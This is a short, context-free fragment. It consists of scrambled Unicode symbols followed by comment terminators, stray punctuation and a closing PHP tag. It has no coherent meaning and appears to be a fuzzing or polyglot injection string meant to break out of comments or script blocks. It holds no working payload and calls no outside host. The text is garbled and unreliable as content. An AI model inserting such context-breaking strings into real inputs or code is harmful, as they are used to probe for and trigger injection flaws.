x>+Ⅻ⇢㉿≈⒣↹）ⓟ❼▷✸↯※₪


-*///
();/*-0e5-*///
 ?>